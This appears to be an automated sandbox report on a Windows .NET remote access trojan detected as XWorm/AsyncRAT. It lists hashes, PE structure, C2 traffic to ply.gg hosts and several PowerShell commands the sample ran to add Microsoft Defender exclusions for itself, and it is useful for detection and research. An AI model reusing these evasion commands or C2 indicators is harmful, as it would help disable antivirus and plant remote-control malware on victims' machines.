SHA-512: D36F0F3C6D62C2BAE97D1AF80A750149788AB419F4C9717B49337DA18E4B6E0E2BEFF4EAB2D364BB9946649E978EC527CAE1174E9DF1B1FF08CCD87DF6FF8DFF
Malicious: true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 89%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..g................................ ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......,U..TO............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.564386838220718
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: Zvas34nq1T.exe
File size: 36'864 bytes
MD5: 3830ea8c8b7a7730a6446ca3c8a61180
SHA1: cf9e202a5d5139e7e5ee375653397f0dbd5b11a6
SHA256: 95e1104df5d9080402316949de1137c886f9d53d884cee12d10af499f41d5ac1
SHA512: d36f0f3c6d62c2bae97d1af80a750149788ab419f4c9717b49337da18e4b6e0e2beff4eab2d364bb9946649e978ec527cae1174e9df1b1ff08ccd87df6ff8dff
SSDEEP: 768:VSjIY2VJO7RWR6nhP7Irb5Fyl98T6YOjhYF9:VwIPwWR6nhP0RFQ98T6YOjM
TLSH: DDF24A4833914316DAED5FF46EB3A1420639F6038A17EB4E0CD8859B6B67BC189523E7
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..g................................. ........@.. ....................................@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x40a4ce
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x671A9F51 [Thu Oct 24 19:26:09 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa480 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x4d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x84d4 | 0x8600 | 2efed440104d8c79f571376650f8a457 | False | 0.4917502332089552 | data | 5.6993751684299285 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0x4d8 | 0x600 | 2472af5ddbb53779b7381f16b8b9407b | False | 0.3756510416666667 | data | 3.7216503306685733 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe000 | 0xc | 0x200 | 3ec8867d86d20189e9da17e1436dcfcb | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc0a0 | 0x244 | data | | | 0.4724137931034483
RT_MANIFEST | 0xc2e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 18:07:11.496541023 CET | 49789 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:11.501993895 CET | 65059 | 49789 | 147.185.221.21 | 192.168.2.4
Oct 27, 2024 18:07:11.502104044 CET | 49789 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:11.614803076 CET | 49789 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:11.620275021 CET | 65059 | 49789 | 147.185.221.21 | 192.168.2.4
Oct 27, 2024 18:07:19.990658998 CET | 65059 | 49789 | 147.185.221.21 | 192.168.2.4
Oct 27, 2024 18:07:19.990897894 CET | 49789 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:22.949549913 CET | 49789 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:22.955055952 CET | 65059 | 49789 | 147.185.221.21 | 192.168.2.4
Oct 27, 2024 18:07:25.232074022 CET | 49864 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:25.237658024 CET | 65059 | 49864 | 147.185.221.21 | 192.168.2.4
Oct 27, 2024 18:07:25.237741947 CET | 49864 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:25.270648003 CET | 49864 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:25.275975943 CET | 65059 | 49864 | 147.185.221.21 | 192.168.2.4
Oct 27, 2024 18:07:33.719240904 CET | 65059 | 49864 | 147.185.221.21 | 192.168.2.4
Oct 27, 2024 18:07:33.719360113 CET | 49864 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:36.667963028 CET | 49864 | 65059 | 192.168.2.4 | 147.185.221.21
Oct 27, 2024 18:07:36.673363924 CET | 65059 | 49864 | 147.185.221.21 | 192.168.2.4
Oct 27, 2024 18:07:36.703881979 CET | 49928 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:36.709189892 CET | 65059 | 49928 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:07:36.709292889 CET | 49928 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:36.731342077 CET | 49928 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:36.736706018 CET | 65059 | 49928 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:07:45.217463970 CET | 65059 | 49928 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:07:45.217628956 CET | 49928 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:46.980808020 CET | 49928 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:46.986263990 CET | 65059 | 49928 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:07:49.123004913 CET | 49998 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:49.128438950 CET | 65059 | 49998 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:07:49.129286051 CET | 49998 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:49.175688028 CET | 49998 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:49.181310892 CET | 65059 | 49998 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:07:57.638277054 CET | 65059 | 49998 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:07:57.640429020 CET | 49998 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:59.730690956 CET | 49998 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:07:59.736222029 CET | 65059 | 49998 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:08:03.670505047 CET | 50010 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:08:03.675950050 CET | 65059 | 50010 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:08:03.676050901 CET | 50010 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:08:03.732853889 CET | 50010 | 65059 | 192.168.2.4 | 147.185.221.23
Oct 27, 2024 18:08:03.738287926 CET | 65059 | 50010 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:08:12.155473948 CET | 65059 | 50010 | 147.185.221.23 | 192.168.2.4
Oct 27, 2024 18:08:12.155529022 CET | 50010 | 65059 | 192.168.2.4 | 147.185.221.23
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 18:07:11.455612898 CET | 59860 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 18:07:11.492434978 CET | 53 | 59860 | 1.1.1.1 | 192.168.2.4
Oct 27, 2024 18:07:36.670016050 CET | 59663 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 18:07:36.703133106 CET | 53 | 59663 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 27, 2024 18:07:11.455612898 CET | 192.168.2.4 | 1.1.1.1 | 0xa34f | Standard query (0) | develop-versions.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:07:36.670016050 CET | 192.168.2.4 | 1.1.1.1 | 0xc852 | Standard query (0) | have-lucia.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 27, 2024 18:07:11.492434978 CET | 1.1.1.1 | 192.168.2.4 | 0xa34f | No error (0) | develop-versions.gl.at.ply.gg | | 147.185.221.21 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 18:07:36.703133106 CET | 1.1.1.1 | 192.168.2.4 | 0xc852 | No error (0) | have-lucia.gl.at.ply.gg | | 147.185.221.23 | A (IP address) | IN (0x0001) | false

                                                                        Target ID:0
                                                                        Start time:13:06:01
                                                                        Start date:27/10/2024
                                                                        Path:C:\Users\user\Desktop\Zvas34nq1T.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\Zvas34nq1T.exe"
                                                                        Imagebase:0xe10000
                                                                        File size:36'864 bytes
                                                                        MD5 hash:3830EA8C8B7A7730A6446CA3C8A61180
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1682797432.0000000000E12000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:1
                                                                        Start time:13:06:05
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zvas34nq1T.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:13:06:05
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:4
                                                                        Start time:13:06:12
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Zvas34nq1T.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:13:06:12
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff7699e0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:13:06:24
                                                                        Start date:27/10/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
                                                                        Imagebase:0x7ff788560000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

Target ID: 10
Start time: 13:06:24
Start date: 27/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 13:06:39
Start date: 27/10/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 13:06:39
Start date: 27/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 13:07:10
Start date: 27/10/2024
Path: C:\Users\user\AppData\Roaming\explorer.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\explorer.exe"
Imagebase: 0x5c0000
File size: 36'864 bytes
MD5 hash: 3830EA8C8B7A7730A6446CA3C8A61180
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 89%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 14
Start time: 13:07:19
Start date: 27/10/2024
Path: C:\Users\user\AppData\Roaming\explorer.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\explorer.exe"
Imagebase: 0x1a0000
File size: 36'864 bytes
MD5 hash: 3830EA8C8B7A7730A6446CA3C8A61180
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 19.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0

Execution graph (nodes and edges):
• Node 3130: 7ffd9b8925dd
• Node 3131: 7ffd9b89260f (RtlSetProcessIsCritical)
• Node 3133: 7ffd9b8926c2
• Edges: 3130 -> 3131, 3131 -> 3133

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.2985442851.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b890000_Zvas34nq1T.jbxd
Similarity
• String ID: SAN_^
• API String ID: 0-3629432999
• Opcode ID: d2c7ee4f6ddc1b31cb1b7d5498b096773f9f296fab0c535d33be783fd5fe6a58
• Instruction ID: 502fa9569343f1a27d54a62dd13c4fd138ac5d870d40dc943ea25ccae4963d5d
• Opcode Fuzzy Hash: d2c7ee4f6ddc1b31cb1b7d5498b096773f9f296fab0c535d33be783fd5fe6a58
• Instruction Fuzzy Hash: C612D721B2DA494FEB98FB7888696BD77D2FF9C304F440579E41DC32D6DE28A8418781

Control-flow Graph

Control-flow graph (basic blocks and edges):
• Block 144: 7ffd9b8925dd-7ffd9b8926c0 (RtlSetProcessIsCritical)
• Block 148: 7ffd9b8926c8-7ffd9b8926fd
• Block 149: 7ffd9b8926c2
• Edges: 144 -> 148, 144 -> 149, 149 -> 148

APIs
Memory Dump Source
• Source File: 00000000.00000002.2985442851.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b890000_Zvas34nq1T.jbxd
Similarity
• API ID: CriticalProcess
• API String ID: 2695349919-0
• Opcode ID: a1422384bff81105ad7d53aea73b5dded1202dbb3462ea5502252e66a7e53ac1
• Instruction ID: 7189f6be3b1cb0d75c71a8a52763367e9b3bb04cc4d6486f23d7a9c5e7b1d30b
• Opcode Fuzzy Hash: a1422384bff81105ad7d53aea73b5dded1202dbb3462ea5502252e66a7e53ac1
• Instruction Fuzzy Hash: 2B41F23190C6488FCB19DF98D855AE9BBF0EF5A310F04416EE08AC3592CB746846CB91
Strings
Memory Dump Source
• Source File: 00000001.00000002.1783907356.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
Similarity
• String ID: N_^4$N_^7$N_^F$N_^J
• API String ID: 0-3508309026
• Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
• Instruction ID: 3d73ddd26afee8af5c4e977c855be3ba5e549368567e4c73e868d7912246f78f
• Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
• Instruction Fuzzy Hash: B32107B77084358ED30A7BBCBD289D93740DB9423874501B3D2A9CB183E914608786C1

Strings
Memory Dump Source
• Source File: 00000004.00000002.1899503788.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
Similarity
• String ID: (7Kp$J_H
• API String ID: 0-3022419712
• Opcode ID: 6d233542ec4dc88c6cb3412244bea08f75a59d804294b724484b0f57a86220f5
• Instruction ID: 9e552f67dca1437adf987bd34b63fa78a08658b623e3207f85c70197b9c1c885
• Opcode Fuzzy Hash: 6d233542ec4dc88c6cb3412244bea08f75a59d804294b724484b0f57a86220f5
• Instruction Fuzzy Hash: 9CA23922B1F78A1FE7A6976858A55B43FE1EF56210B0A01FFD08DC71E3DE18AD068351

Strings
Memory Dump Source
• Source File: 00000004.00000002.1899503788.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
Similarity
• String ID: X7Kp
• API String ID: 0-1297214646
• Opcode ID: 42dcfc36f263d7606089535cbc7ba537cfa41d5061d4e4cdadc201639423eac1
• Instruction ID: afa242e2edd0839355d0b576ee4958c7b2ac1896ab598ea6baaaabf16e2c0466
• Opcode Fuzzy Hash: 42dcfc36f263d7606089535cbc7ba537cfa41d5061d4e4cdadc201639423eac1
• Instruction Fuzzy Hash: B9D15632A1FB8D1FEBA5EBA848A55B57BE1EF56310B0901FED45CC70E3DA18AD058341
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8ef75f2c741e329909f82a319cf2ad885aec50a9a6b142d1358b1258e65e9c75
                                                                          • Instruction ID: 00f0d83d4c12f3c9171ee2c8f440895aa1d5e7643ca6225467baa4130732c9a3
                                                                          • Opcode Fuzzy Hash: 8ef75f2c741e329909f82a319cf2ad885aec50a9a6b142d1358b1258e65e9c75
                                                                          • Instruction Fuzzy Hash: A541287190DB884FDB199F5C9C0A6A97BE0FB59310F04416FE499C3292CA74A905CBC2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1899503788.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 32f3f9e0461efefb0ecb9c88f39db5a9a853ff20f505fb78b9135050b4a0b32a
                                                                          • Instruction ID: 472576a37f5b9bf85a72617f25f3f851de5fe30da02cb58298aac34b15ffa3f0
                                                                          • Opcode Fuzzy Hash: 32f3f9e0461efefb0ecb9c88f39db5a9a853ff20f505fb78b9135050b4a0b32a
                                                                          • Instruction Fuzzy Hash: 7421C422B2E98A2FE7B9EA5844A227867C1EF65210B4A40BDD05DC76B3DE14EC058341
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6927ed7a30ec17e123cf7dbc2df199ed9af3f416a639a16b45393ac883a46ec2
                                                                          • Instruction ID: 66e3edb859411b74877b3245194366d37b9d38874e2a268cb10d9087d9a2d402
                                                                          • Opcode Fuzzy Hash: 6927ed7a30ec17e123cf7dbc2df199ed9af3f416a639a16b45393ac883a46ec2
                                                                          • Instruction Fuzzy Hash: 5621F63190C74C4FDB59DBAC984A7E97BE0EB96321F04416BD448C3166DA74A81ACB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1897576662.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b78d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40063d549586df959eece74cd26b6b93e13cc3102fc03c79475eab84498f6f49
                                                                          • Instruction ID: 0f0480cae4aaf4d335530606a5ae79f4c88074161cead5db0406e4a52d42084b
                                                                          • Opcode Fuzzy Hash: 40063d549586df959eece74cd26b6b93e13cc3102fc03c79475eab84498f6f49
                                                                          • Instruction Fuzzy Hash: F3113D31A0CF088F9BA8EF2DE4859567BE1FB98321B10066ED449C7665D731E881CB82
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1899503788.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b970000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8ea837c6a8f7bd92170f423fc9a96f65f628c10f54b7df1a2b2602d252f61ea
                                                                          • Instruction ID: a2e6136c0174c8a312cd33b458fe0de0f966c95637d170e0389fef720c216166
                                                                          • Opcode Fuzzy Hash: b8ea837c6a8f7bd92170f423fc9a96f65f628c10f54b7df1a2b2602d252f61ea
                                                                          • Instruction Fuzzy Hash: C1110232B1F54A5FE7B8D65C94B06B837D0FF40720B5A00BEE42DC76A3DA18AD018340
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0ea3224fededb862c73b412190b38ab12614bba5c17fe80d02cae77ec77d79ec
                                                                          • Instruction ID: b4a53389b0460cefb70e55dbe9114543f6f45a89c33c7260302d4b18b48822b0
                                                                          • Opcode Fuzzy Hash: 0ea3224fededb862c73b412190b38ab12614bba5c17fe80d02cae77ec77d79ec
                                                                          • Instruction Fuzzy Hash: F3F03C6264E3C20FE3164768AC624A47FB0DE5323070952EBD4C1CA4A3D55A584B8761
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1898647347.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9b8a0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
